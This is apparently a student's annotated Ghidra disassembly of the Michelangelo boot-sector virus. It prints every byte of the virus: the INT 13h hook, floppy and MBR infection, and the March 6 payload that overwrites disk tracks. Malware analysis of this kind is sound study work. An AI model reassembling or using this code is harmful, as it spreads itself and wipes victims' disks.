;************************************************************************************************
;* File: michaelangelo.1 (for assignment 2&3 in GLND's RE) *
;* By: Zachary Robert James (zjames8@lsu.edu; zach15james@proton.me) *
;* Tool: Ghidra ... bc: *
;* (in FL with family, and Cisco VPN --> QNAP server --> VMware on my local laptop lacked permis...*
;* ie (i) rebasing, (ii) commenting, that it would be okay...) *
;************************************************************************************************
;-----------------------------------------------------------------------
; Boot-sector image header (the BIOS loads this 512-byte sector at 0000:7C00).
; Offsets 0x03..0x0D form a small data area; the rest of the code addresses
; it as [0x3]..[0xD] whenever DS == CS in the resident copy.
;-----------------------------------------------------------------------
LAB_0000_7c00: ;XREF[2,1]: 0000:7cee(R),0000:7cee(R),0000:7cee(R)
ram:0000:7c00 e9ac00 JMP FUN_0000_7caf ;first instruction executed: skip the data area and enter the installer
DAT_0000_7c03: ;XREF[1]: 0000:7cf0(R)
ram:0000:7c03 f500 undefined2 00F5h ;High_Entry: offset half of the far pointer used by JMPF CS:[7c03] at 7cf0; 0x00F5 == 7cf5-7c00, i.e. the instruction right after the JMPF, executed from the relocated copy
DAT_0000_7c05: ;XREF[1]: 0000:7cd8(W)
ram:0000:7c05 0000 undefined2 0000h ;High_Entry_Seg: segment half of that far pointer; 0 on disk, filled in at 7cd8 with the segment carved off the top of conventional memory
ram:0000:7c07 02 ?? 02h ;Disk_Heads: head count used as the loop bound at 7d7b (2 on disk; set to 4 at 7d65 for a hard disk)
ram:0000:7c08 0e ?? 0Eh ;Orig_BootS: low byte of the word at [0x8] = CX (CL = sector, CH = cylinder) where the original boot sector is parked; rewritten at 7c80 (floppy: 3 or 0xE) and 7d8a (hard disk: 7)
ram:0000:7c09 00 ?? 00h ;high byte of that word (CH = cylinder 0)
DAT_0000_7c0a: ;XREF[1]: 0000:7cc1(W)
ram:0000:7c0a 3997 undefined2 9739h ;Int_13: offset of the saved original INT 13h vector; overwritten from IVT entry 0000:004C at 7cc1; every PUSHF + CALLF [0xa] in this file goes through it
DAT_0000_7c0c: ;XREF[1]: 0000:7cc7(W)
ram:0000:7c0c 00f0 undefined2 F000h ;Int_13_Seg: segment of the saved vector; overwritten from 0000:004E at 7cc7 (F000h is merely what this sample carried on disk)
;Evil_Int_13
;-----------------------------------------------------------------------
; Replacement INT 13h handler (image offset 0x0E, which is exactly the
; value the installer stores into IVT entry 0000:004C at 7cde).
; In:    DL = drive number as passed by the caller of INT 13h
; Flow:  a request for any drive other than 0, or for drive 0 while its
;        motor-status bit is already set, is chained straight to the
;        original handler.  Otherwise the original handler services the
;        request and FUN_0000_7c36 runs afterwards on drive 0.
; Note:  the original handler is always reached via PUSHF + CALLF, which
;        mimics an INT, using the vector saved at CS:[0xa].
;-----------------------------------------------------------------------
ram:0000:7c0e 1e PUSH DS ;save the caller's DS and AX; both are needed to reach the BIOS data area
ram:0000:7c0f 50 PUSH AX
ram:0000:7c10 0ad2 OR DL,DL ;DL == 0 ? (drive 0 / A:)
ram:0000:7c12 751b JNZ LAB_0000_7c2f ;not drive 0: pass the request through untouched
ram:0000:7c14 33c0 XOR AX,AX ;DS := 0 so [0x43f] addresses the BIOS data area
ram:0000:7c16 8ed8 MOV DS,AX
ram:0000:7c18 f6063f0401 TEST byte ptr [0x43f],0x1 ;0040:003F = BIOS floppy motor-status byte; bit 0 = drive 0 motor running
ram:0000:7c1d 7510 JNZ LAB_0000_7c2f ;motor already on: pass through (NOTE(review): reads like a cheap "drive busy / already visited" filter — intent inferred)
ram:0000:7c1f 58 POP AX ;restore the caller's registers before forwarding the request
ram:0000:7c20 1f POP DS
ram:0000:7c21 9c PUSHF ;PUSHF + CALLF = software INT into the original handler
ram:0000:7c22 2eff1e0a00 CALLF [0xa] ;CS:[0xa] = saved original INT 13h vector
ram:0000:7c27 9c PUSHF ;keep the original handler's result flags (CF = error status)
ram:0000:7c28 e80b00 CALL FUN_0000_7c36 ;infection attempt on drive 0 (that routine preserves every register itself)
ram:0000:7c2b 9d POPF ;bring back the original handler's flags
ram:0000:7c2c ca0200 RETF 0x2 ;return to the INT 13h caller and discard the FLAGS word the INT pushed, so CF from the real handler reaches the caller like a normal INT 13h status
LAB_0000_7c2f: ;XREF[2]: 0000:7c12(j),0000:7c1d(j)
ram:0000:7c2f 58 POP AX ;pass-through path: restore and chain to the original handler
ram:0000:7c30 1f POP DS
ram:0000:7c31 2eff2e0a00 JMPF CS:[DAT_0000_000a] ;tail-jump through the saved vector; the original handler's own return goes back to the caller
;************************************************************************************************
;* FUNCTION *
;************************************************************************************************
;undefined FUN_0000_7c36()
;-----------------------------------------------------------------------
; FUN_0000_7c36 — floppy infection routine, called from the INT 13h hook
; right after the original handler has serviced a drive-0 request.
; Preserves: AX BX CX DX DS ES SI DI (pushed on entry, popped at 7ca6).
; Uses:      DS = ES = CS (segment of the resident image)
;            CS:0x200 as a one-sector scratch buffer
;            [0x8]  = CX (cylinder/sector) where the original boot sector
;                     is parked; written here, read back by the boot-time
;                     code (7d03/7d13) and by the payload (7d53)
;            [0xa]  = saved original INT 13h vector (PUSHF + CALLF)
; Steps:     (1) read cylinder 0 / head 0 / sector 1 of drive 0 into
;                CS:0x200, resetting the drive and retrying up to 4 times;
;            (2) if its first two words equal the image's first two words,
;                treat the disk as already infected and leave;
;            (3) write the sector just read to head 1, sector 3 (media byte
;                0xFD) or sector 0xE (any other format);
;            (4) copy the last 0x42 bytes of that sector into the image at
;                offset 0x1BE, then write the image over sector 1.
; Reading tip: a routine that saves every register on entry and restores
; all of them on exit leaves no visible trace to its caller; that bracket
; is often a sign that the real side effect is hidden in the middle.
;-----------------------------------------------------------------------
;XREF[1]: 0000:7c28(c)
ram:0000:7c36 50 PUSH AX ;save every register this routine touches
ram:0000:7c37 53 PUSH BX
ram:0000:7c38 51 PUSH CX
ram:0000:7c39 52 PUSH DX
ram:0000:7c3a 1e PUSH DS
ram:0000:7c3b 06 PUSH ES
ram:0000:7c3c 56 PUSH SI
ram:0000:7c3d 57 PUSH DI
ram:0000:7c3e 0e PUSH CS ;DS := CS
ram:0000:7c3f 1f POP DS
ram:0000:7c40 0e PUSH CS ;ES := CS
ram:0000:7c41 07 POP ES
ram:0000:7c42 be0400 MOV SI,0x4 ;SI = remaining read attempts (4)
LAB_0000_7c45: ;XREF[1]: 0000:7c5f(j)
ram:0000:7c45 b80102 MOV AX,0x201 ;AH=02h read sectors, AL=1 sector
ram:0000:7c48 bb0002 MOV BX,0x200 ;ES:BX = CS:0x200, scratch buffer just past the 512-byte image
ram:0000:7c4b b90100 MOV CX,0x1 ;CH=0 cylinder 0, CL=1 sector 1 (the boot sector)
ram:0000:7c4e 33d2 XOR DX,DX ;DH=0 head 0, DL=0 drive 0 (A:)
ram:0000:7c50 9c PUSHF ;PUSHF + CALLF = INT through the saved original vector
ram:0000:7c51 ff1e0a00 CALLF [0xa]
ram:0000:7c55 730c JNC LAB_0000_7c63 ;CF clear = read succeeded
ram:0000:7c57 33c0 XOR AX,AX ;AH=00h reset disk system before retrying
ram:0000:7c59 9c PUSHF
ram:0000:7c5a ff1e0a00 CALLF [0xa]
ram:0000:7c5e 4e DEC SI ;one attempt used
ram:0000:7c5f 75e4 JNZ LAB_0000_7c45 ;attempts left: try the read again
ram:0000:7c61 eb43 JMP LAB_0000_7ca6 ;four failures: give up and restore registers
;read succeeded: is this disk already carrying the image?
LAB_0000_7c63: ;XREF[1]: 0000:7c55(j)
ram:0000:7c63 33f6 XOR SI,SI ;DS:SI = CS:0, first word of the resident image
ram:0000:7c65 fc CLD ;string ops count upward
ram:0000:7c66 ad LODSW SI ;AX = image word 0
;************************************************************************************************
;* If both compares hold, the sector read from the disk begins with the same two words as the   *
;* image; that is taken as "already infected" and the routine exits without writing anything.   *
;************************************************************************************************
ram:0000:7c67 3b07 CMP AX,word ptr [BX] ;compare with word 0 of the sector just read
ram:0000:7c69 7506 JNZ LAB_0000_7c71 ;differs: not infected, go infect
ram:0000:7c6b ad LODSW SI ;AX = image word 1
ram:0000:7c6c 3b4702 CMP AX,word ptr [BX + 0x2] ;compare with word 1 of the sector
ram:0000:7c6f 7435 JZ LAB_0000_7ca6 ;both match: already infected, exit
LAB_0000_7c71: ;XREF[1]: 0000:7c69(j)
ram:0000:7c71 b80103 MOV AX,0x301 ;AH=03h write sectors, AL=1: park the original boot sector elsewhere on the disk
ram:0000:7c74 b601 MOV DH,0x1 ;head 1 (DL still 0 = drive A:)
ram:0000:7c76 b103 MOV CL,0x3 ;sector 3 (CH still 0 = cylinder 0)
ram:0000:7c78 807f15fd CMP byte ptr [BX + 0x15],0xfd ;BPB media-descriptor byte of the sector just read; 0xFD = 360 KB 5.25" format
ram:0000:7c7c 7402 JZ LAB_0000_7c80 ;360 KB: keep sector 3
ram:0000:7c7e b10e MOV CL,0xe ;any other format: use sector 14
LAB_0000_7c80: ;XREF[1]: 0000:7c7c(j)
ram:0000:7c80 890e0800 MOV word ptr [0x8],CX ;remember where the original went; 7d03/7d13 and 7d53 read this back
ram:0000:7c84 9c PUSHF
ram:0000:7c85 ff1e0a00 CALLF [0xa] ;write ES:BX (the original boot sector) to head 1, sector CL
ram:0000:7c89 721b JC LAB_0000_7c6f ;write failed: exit without touching sector 1
;graft the tail of the original sector (bytes 0x1BE..0x1FF, 0x21 words) into the image at the same offset
ram:0000:7c8b bebe03 MOV SI,0x3be ;source: 0x200 + 0x1BE inside the scratch buffer
ram:0000:7c8e bfbe01 MOV DI,0x1be ;destination: image offset 0x1BE (partition-table / signature area)
ram:0000:7c91 b92100 MOV CX,0x21 ;0x21 words = 66 bytes
ram:0000:7c94 fc CLD
ram:0000:7c95 f3a5 MOVSW.REP ES:DI,SI ;REP MOVSW: those 66 bytes now live in the image that is about to be written out
ram:0000:7c97 b80103 MOV AX,0x301 ;AH=03h write 1 sector
ram:0000:7c9a 33db XOR BX,BX ;ES:BX = CS:0, the whole 512-byte image (it carries the [0x8] value stored above)
ram:0000:7c9c b90100 MOV CX,0x1 ;cylinder 0, sector 1
ram:0000:7c9f 33d2 XOR DX,DX ;head 0, drive 0
ram:0000:7ca1 9c PUSHF
ram:0000:7ca2 ff1e0a00 CALLF [0xa] ;overwrite the boot sector with the image; the result is not checked
LAB_0000_7ca6: ;XREF[3]: 0000:7c61(j),0000:7c6f(j),0000:7c89(j)
ram:0000:7ca6 5f POP DI ;common exit: restore every register in reverse order
ram:0000:7ca7 5e POP SI
ram:0000:7ca8 07 POP ES
ram:0000:7ca9 1f POP DS
ram:0000:7caa 5a POP DX
ram:0000:7cab 59 POP CX
ram:0000:7cac 5b POP BX
ram:0000:7cad 58 POP AX
ram:0000:7cae c3 RET
;************************************************************************************************
;* FUNCTION *
;************************************************************************************************
;undefined FUN_0000_7caf()
;-----------------------------------------------------------------------
; FUN_0000_7caf — entry point reached by the JMP at 7c00 when the BIOS
; boots this sector at 0000:7C00.
; Part 1 (7caf..7cf0, executes from 0000:7C00):
;   - stack at 0000:7C00, growing down below the image;
;   - pushes the far address 0000:7C00 (consumed by the RETF at 7d4a);
;   - saves the INT 13h vector (IVT 0000:004C/004E) into the image;
;   - lowers the BIOS base-memory count at 0040:0013 by 2 KB and takes the
;     freed segment (KB << 6) as the new home of the image;
;   - points IVT 0x13 at seg:000E (Evil_Int_13) and copies the first 0x1BE
;     bytes of the image there;
;   - far-jumps to seg:00F5, the instruction after the JMPF.
; Part 2 (7cf5 onward, executes from the high copy, CS = that segment):
;   - reads the parked original boot sector / MBR back to 0000:7C00 using
;     the location stored at [0x8];
;   - reads the first hard disk's MBR into CS:0x200 and, unless its first
;     two words already match the image, goes to LAB_0000_7d87 to infect it;
;   - LAB_0000_7d3e: reads the RTC date; on 03/06 runs the destructive loop
;     at 7d50, otherwise RETF to 0000:7C00 to run the original boot sector.
;-----------------------------------------------------------------------
;XREF[1]: 0000:7c00(c)
ram:0000:7caf 33c0 XOR AX,AX ;AX = 0, then DS = SS = 0
ram:0000:7cb1 8ed8 MOV DS,AX
ram:0000:7cb3 fa CLI ;no interrupts while SS:SP is being switched
ram:0000:7cb4 8ed0 MOV SS,AX
ram:0000:7cb6 b8007c MOV AX,0x7c00
ram:0000:7cb9 8be0 MOV SP,AX ;SS:SP = 0000:7C00, stack grows down from the load address
ram:0000:7cbb fb STI
ram:0000:7cbc 1e PUSH DS ;push 0000:7C00 as a far return address; the RETF at 7d4a pops it and runs whatever was read to 0000:7C00 by then (the original boot sector)
ram:0000:7cbd 50 PUSH AX
ram:0000:7cbe a14c00 MOV AX,[0x4c] ;IVT entry 0x13 (0x13*4 = 0x4C): offset of the current INT 13h handler
ram:0000:7cc1 a30a7c MOV [DAT_0000_7c0a],AX ;save it in the image so the hook can chain to it
ram:0000:7cc4 a14e00 MOV AX,[0x4e] ;segment of the current INT 13h handler
ram:0000:7cc7 a30c7c MOV [DAT_0000_7c0c],AX
ram:0000:7cca a11304 MOV AX,[0x413] ;0040:0013 = BIOS base memory size in KB
ram:0000:7ccd 48 DEC AX ;take 2 KB off the top so the OS never allocates the resident copy
ram:0000:7cce 48 DEC AX
ram:0000:7ccf a31304 MOV [0x413],AX
ram:0000:7cd2 b106 MOV CL,0x6
ram:0000:7cd4 d3e0 SHL AX,CL ;KB * 64 = paragraph (segment) address of the reserved 2 KB
ram:0000:7cd6 8ec0 MOV ES,AX ;ES = destination segment for the resident copy
ram:0000:7cd8 a3057c MOV [DAT_0000_7c05],AX ;segment half of the far pointer used by the JMPF below
ram:0000:7cdb b80e00 MOV AX,0xe ;IVT 0x13 := ES:000E = Evil_Int_13 inside the resident copy
ram:0000:7cde a34c00 MOV [0x4c],AX
ram:0000:7ce1 8c064e00 MOV word ptr [0x4e],ES
ram:0000:7ce5 b9be01 MOV CX,0x1be ;copy 0x1BE = 446 bytes (everything before the partition-table area)
ram:0000:7ce8 be007c MOV SI,0x7c00 ;DS:SI = 0000:7C00 (this image)
ram:0000:7ceb 33ff XOR DI,DI ;ES:DI = seg:0000
ram:0000:7ced fc CLD
; FWD[2]: 0000:7c00(R),0000:7c01(R)
ram:0000:7cee f3a4 MOVSB.REP ES:DI,SI=>LAB_0000_7c00 ;REP MOVSB: relocate the image into the reserved segment
ram:0000:7cf0 2eff2e037c JMPF CS:[DAT_0000_7c03] ;far jump via 7c03/7c05 = seg:00F5, the next instruction but in the high copy; CS changes here
ram:0000:7cf5 33c0 XOR AX,AX ;AH=00h reset disk system
ram:0000:7cf7 8ec0 MOV ES,AX ;ES = 0
ram:0000:7cf9 cd13 INT 0x13 ;DL is not set here; presumably still holds the boot-drive number left by the BIOS — verify against the boot-time register state
ram:0000:7cfb 0e PUSH CS ;DS := CS (the resident copy) so [0x8] and friends address the image
ram:0000:7cfc 1f POP DS
ram:0000:7cfd b80102 MOV AX,0x201 ;AH=02h read 1 sector
ram:0000:7d00 bb007c MOV BX,0x7c00 ;ES:BX = 0000:7C00: the original boot sector goes where the BIOS expects a boot sector
ram:0000:7d03 8b0e0800 MOV CX,word ptr [0x8] ;CX = stored cylinder/sector of the parked original
ram:0000:7d07 83f907 CMP CX,0x7 ;7 is only ever stored by the hard-disk path (7d8a); 3 / 0xE come from the floppy path
ram:0000:7d0a 7507 JNZ LAB_0000_7d13 ;not 7: this image came from a floppy
ram:0000:7d0c ba8000 MOV DX,0x80 ;hard disk 0, head 0
ram:0000:7d0f cd13 INT 0x13 ;read the parked MBR to 0000:7C00
ram:0000:7d11 eb2b JMP LAB_0000_7d3e ;the hard disk is the infected source here, so skip the MBR check
;floppy boot path
LAB_0000_7d13: ;XREF[1]: 0000:7d0a(j)
ram:0000:7d13 8b0e0800 MOV CX,word ptr [0x8] ;CX = cylinder 0, sector 3 or 0xE
ram:0000:7d17 ba0001 MOV DX,0x100 ;DH=1 head 1, DL=0 drive A:
ram:0000:7d1a cd13 INT 0x13 ;read the parked floppy boot sector to 0000:7C00
ram:0000:7d1c 7220 JC LAB_0000_7d3e ;read failed: go straight to the date check
ram:0000:7d1e 0e PUSH CS ;ES := CS for the scratch buffer below
ram:0000:7d1f 07 POP ES
ram:0000:7d20 b80102 MOV AX,0x201 ;AH=02h read 1 sector
ram:0000:7d23 bb0002 MOV BX,0x200 ;ES:BX = CS:0x200, scratch buffer just past the image
ram:0000:7d26 b90100 MOV CX,0x1 ;cylinder 0, sector 1
ram:0000:7d29 ba8000 MOV DX,0x80 ;hard disk 0, head 0: the MBR
ram:0000:7d2c cd13 INT 0x13
ram:0000:7d2e 720e JC LAB_0000_7d3e ;no hard disk / read error: date check
ram:0000:7d30 33f6 XOR SI,SI ;DS:SI = CS:0, first word of the image
ram:0000:7d32 fc CLD
ram:0000:7d33 ad LODSW SI ;AX = image word 0
ram:0000:7d34 3b07 CMP AX,word ptr [BX] ;equal to MBR word 0 ?
ram:0000:7d36 754f JNZ LAB_0000_7d87 ;no: MBR not infected, go infect it
ram:0000:7d38 ad LODSW SI ;AX = image word 1
ram:0000:7d39 3b4702 CMP AX,word ptr [BX + 0x2]
ram:0000:7d3c 7549 JNZ LAB_0000_7d87 ;no: infect
;MBR already matches the image (or there is no hard disk): trigger-date check
LAB_0000_7d3e: ;XREF[5]: 0000:7d11(j),0000:7d1c(j),0000:7d2e(j),0000:7d96(j),
; 0000:7dac(j)
ram:0000:7d3e 33c9 XOR CX,CX ;CX cleared before the RTC call (presumably so a failed call leaves no stale CH/CL — intent inferred)
ram:0000:7d40 b404 MOV AH,0x4 ;INT 1Ah AH=04h: read real-time-clock date; DH = month, DL = day (BCD)
ram:0000:7d42 cd1a INT 0x1a
ram:0000:7d44 81fa0603 CMP DX,0x306 ;month 03, day 06: March 6th, the trigger date
ram:0000:7d48 7401 JZ LAB_0000_7d4b ;trigger date: run the destructive payload
ram:0000:7d4a cb RETF ;any other day: pop the 0000:7C00 pushed at 7cbc/7cbd and run the original boot sector read there; the INT 13h hook stays resident
LAB_0000_7d4b: ;XREF[1]: 0000:7d48(j)
ram:0000:7d4b 33d2 XOR DX,DX ;DH=0 head 0, DL=0 drive A:
ram:0000:7d4d b90100 MOV CX,0x1 ;cylinder 0, sector 1
LAB_0000_7d50: ;XREF[2]: 0000:7d7f(j),0000:7d85(j)
ram:0000:7d50 b80903 MOV AX,0x309 ;AH=03h write, AL=9 sectors (one 360 KB track)
ram:0000:7d53 8b360800 MOV SI,word ptr [0x8] ;SI = parked-sector location, reused here as a media-type tag
ram:0000:7d57 83fe03 CMP SI,0x3 ;3 was chosen for media byte 0xFD (360 KB)
ram:0000:7d5a 7410 JZ LAB_0000_7d6c
ram:0000:7d5c b00e MOV AL,0xe ;14 sectors per track otherwise
ram:0000:7d5e 83fe0e CMP SI,0xe ;0xE = other floppy formats
ram:0000:7d61 7409 JZ LAB_0000_7d6c
ram:0000:7d63 b280 MOV DL,0x80 ;neither: hard disk 0
ram:0000:7d65 c606070004 MOV byte ptr [0x7],0x4 ;loop bound = 4 heads
ram:0000:7d6a b011 MOV AL,0x11 ;17 sectors per track
LAB_0000_7d6c: ;XREF[2]: 0000:7d5a(j),0000:7d61(j)
ram:0000:7d6c bb0050 MOV BX,0x5000 ;ES:BX = 5000:5000; whatever that memory holds is what gets written over the disk
ram:0000:7d6f 8ec3 MOV ES,BX
ram:0000:7d71 cd13 INT 0x13 ;write AL sectors to cylinder CH, head DH, starting at sector CL
ram:0000:7d73 7304 JNC LAB_0000_7d79
ram:0000:7d75 32e4 XOR AH,AH ;on error: reset the disk system and carry on regardless
ram:0000:7d77 cd13 INT 0x13
LAB_0000_7d79: ;XREF[1]: 0000:7d73(j)
ram:0000:7d79 fec6 INC DH ;next head
ram:0000:7d7b 3a360700 CMP DH,byte ptr [0x7] ;still below the head count at [0x7] (2 or 4)?
ram:0000:7d7f 72cf JC LAB_0000_7d50 ;yes: same cylinder, next head
ram:0000:7d81 32f6 XOR DH,DH ;no: head 0 of the next cylinder
ram:0000:7d83 fec5 INC CH
ram:0000:7d85 ebc9 JMP LAB_0000_7d50 ;unconditional: this loop has no exit condition
;hard-disk infection: the MBR read to CS:0x200 differs from the image
LAB_0000_7d87: ;XREF[2]: 0000:7d36(j),0000:7d3c(j)
ram:0000:7d87 b90700 MOV CX,0x7 ;cylinder 0, sector 7: where the original MBR is parked
ram:0000:7d8a 890e0800 MOV word ptr [0x8],CX ;record it in the image (the copy written below carries this value)
ram:0000:7d8e b80103 MOV AX,0x301 ;AH=03h write 1 sector
ram:0000:7d91 ba8000 MOV DX,0x80 ;hard disk 0, head 0 (ES:BX still CS:0x200 = the MBR just read)
ram:0000:7d94 cd13 INT 0x13 ;park the original MBR at sector 7
ram:0000:7d96 72a6 JC LAB_0000_7d3e ;write failed: leave the MBR alone, go to the date check
ram:0000:7d98 bebe03 MOV SI,0x3be ;source: the MBR's last 66 bytes (0x200 + 0x1BE)
ram:0000:7d9b bfbe01 MOV DI,0x1be ;destination: image offset 0x1BE, so the image keeps the real partition table and signature
ram:0000:7d9e b92100 MOV CX,0x21 ;0x21 words
ram:0000:7da1 f3a5 MOVSW.REP ES:DI,SI ;REP MOVSW (direction flag still clear from 7d32)
ram:0000:7da3 b80103 MOV AX,0x301 ;AH=03h write 1 sector
ram:0000:7da6 33db XOR BX,BX ;ES:BX = CS:0, the whole image
ram:0000:7da8 fec1 INC CL ;CX is 0 after REP MOVSW, so CX becomes 1: cylinder 0, sector 1
ram:0000:7daa cd13 INT 0x13 ;overwrite the MBR with the image (DX still 0x80)
ram:0000:7dac eb90 JMP LAB_0000_7d3e ;then the date check
ram:0000:7dae 00 ?? 00h ;zero padding from image offset 0x1AE up to the partition-table area
ram:0000:7daf 00 ?? 00h
ram:0000:7db0 00 ?? 00h
ram:0000:7db1 00 ?? 00h
ram:0000:7db2 00 ?? 00h
ram:0000:7db3 00 ?? 00h
ram:0000:7db4 00 ?? 00h
ram:0000:7db5 00 ?? 00h
ram:0000:7db6 00 ?? 00h
ram:0000:7db7 00 ?? 00h
ram:0000:7db8 00 ?? 00h
ram:0000:7db9 00 ?? 00h
ram:0000:7dba 00 ?? 00h
ram:0000:7dbb 00 ?? 00h
ram:0000:7dbc 00 ?? 00h
ram:0000:7dbd 00 ?? 00h
ram:0000:7dbe 00 ?? 00h ;image offset 0x1BE: start of the 66-byte tail that 7c8b..7c95 and 7d98..7da1 replace with the original sector's last 66 bytes before writing the image out; zero in this sample
ram:0000:7dbf 00 ?? 00h
ram:0000:7dc0 00 ?? 00h
ram:0000:7dc1 00 ?? 00h
ram:0000:7dc2 00 ?? 00h
ram:0000:7dc3 00 ?? 00h
ram:0000:7dc4 00 ?? 00h
ram:0000:7dc5 00 ?? 00h
ram:0000:7dc6 00 ?? 00h
ram:0000:7dc7 00 ?? 00h
ram:0000:7dc8 00 ?? 00h
ram:0000:7dc9 00 ?? 00h
ram:0000:7dca 00 ?? 00h
ram:0000:7dcb 00 ?? 00h
ram:0000:7dcc 00 ?? 00h
ram:0000:7dcd 00 ?? 00h
ram:0000:7dce 00 ?? 00h
ram:0000:7dcf 00 ?? 00h
ram:0000:7dd0 00 ?? 00h
ram:0000:7dd1 00 ?? 00h
ram:0000:7dd2 00 ?? 00h
ram:0000:7dd3 00 ?? 00h
ram:0000:7dd4 00 ?? 00h
ram:0000:7dd5 00 ?? 00h
ram:0000:7dd6 00 ?? 00h
ram:0000:7dd7 00 ?? 00h
ram:0000:7dd8 00 ?? 00h
ram:0000:7dd9 00 ?? 00h
ram:0000:7dda 00 ?? 00h
ram:0000:7ddb 00 ?? 00h
ram:0000:7ddc 00 ?? 00h
ram:0000:7ddd 00 ?? 00h
ram:0000:7dde 00 ?? 00h
ram:0000:7ddf 00 ?? 00h
ram:0000:7de0 00 ?? 00h
ram:0000:7de1 00 ?? 00h
ram:0000:7de2 00 ?? 00h
ram:0000:7de3 00 ?? 00h
ram:0000:7de4 00 ?? 00h
ram:0000:7de5 00 ?? 00h
ram:0000:7de6 00 ?? 00h
ram:0000:7de7 00 ?? 00h
ram:0000:7de8 00 ?? 00h
ram:0000:7de9 00 ?? 00h
ram:0000:7dea 00 ?? 00h
ram:0000:7deb 00 ?? 00h
ram:0000:7dec 00 ?? 00h
ram:0000:7ded 00 ?? 00h
ram:0000:7dee 00 ?? 00h
ram:0000:7def 00 ?? 00h
ram:0000:7df0 00 ?? 00h
ram:0000:7df1 00 ?? 00h
ram:0000:7df2 00 ?? 00h
ram:0000:7df3 00 ?? 00h
ram:0000:7df4 00 ?? 00h
ram:0000:7df5 00 ?? 00h
ram:0000:7df6 00 ?? 00h
ram:0000:7df7 00 ?? 00h
ram:0000:7df8 00 ?? 00h
ram:0000:7df9 00 ?? 00h
ram:0000:7dfa 00 ?? 00h
ram:0000:7dfb 00 ?? 00h
ram:0000:7dfc 00 ?? 00h
ram:0000:7dfd 00 ?? 00h
ram:0000:7dfe 55 ?? 55h U ;image offset 0x1FE/0x1FF: 55 AA boot-sector signature the BIOS checks before jumping to 0000:7C00
ram:0000:7dff aa ?? AAh